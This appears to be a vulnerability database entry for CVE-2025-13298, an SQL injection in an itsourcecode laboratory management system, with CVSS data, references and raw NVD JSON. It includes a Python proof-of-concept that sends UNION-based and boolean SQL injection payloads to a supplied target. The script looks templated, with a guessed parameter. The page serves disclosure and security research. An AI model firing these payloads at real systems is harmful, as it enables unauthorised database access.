CVE-2025-13298

Description

A vulnerability was detected in itsourcecode Web-Based Internet Laboratory Management System 1.0. This affects an unknown function of the file /enrollment/controller.php. Performing a manipulation results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:itsourcecode:web-based_internet_laboratory_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Web-Based Internet Laboratory Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13298 SQL Injection PoC
# Target: itsourcecode Web-Based Internet Laboratory Management System 1.0
# Vulnerable file: /enrollment/controller.php

def exploit_sqli(target_url):
    """
    SQL Injection exploit for CVE-2025-13298
    This PoC demonstrates extracting database version information
    """
    # Target endpoint
    endpoint = f"{target_url}/enrollment/controller.php"
    
    # SQL Injection payloads
    # Boolean-based blind injection to extract database version
    payloads = [
        "1' AND 1=1 -- -",  # True condition
        "1' AND 1=2 -- -",  # False condition
        "1' AND (SELECT COUNT(*) FROM users) > 0 -- -",  # Check if users table exists
    ]
    
    # Example: UNION-based injection to extract data
    union_payload = "1' UNION SELECT 1,2,3,version(),5,6,7,8,9,10 -- -"
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting endpoint: {endpoint}")
    print("[*] Testing SQL Injection vulnerability...")
    
    try:
        # Test basic injection
        data = {
            'action': 'test',  # Example parameter - adjust based on actual vulnerable parameter
            'id': union_payload
        }
        
        response = requests.post(endpoint, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Target appears to be vulnerable to SQL Injection")
            print(f"[+] Response length: {len(response.text)} characters")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        
    print("\n[*] Note: This is a basic demonstration. Actual exploitation")
    print("[*] may require parameter and payload adjustment based on")
    print("[*] the specific application behavior.")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_sqli(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13298
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13298
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13298/
[4] VulDB https://vuldb.com/cve/CVE-2025-13298
[5] https://github.com/f14g-orz/CVE/issues/4
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.332638
[8] https://vuldb.com/?id.332638
[9] https://vuldb.com/?submit.691787

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13298", "sourceIdentifier": "[email protected]", "published": "2025-11-17T20:15:50.017", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in itsourcecode Web-Based Internet Laboratory Management System 1.0. This affects an unknown function of the file /enrollment/controller.php. Performing a manipulation results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:itsourcecode:web-based_internet_laboratory_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "148D9177-FE59-4821-8277-90939332B660"}]}]}], "references": [{"url": "https://github.com/f14g-orz/CVE/issues/4", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.332638", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332638", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.691787", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}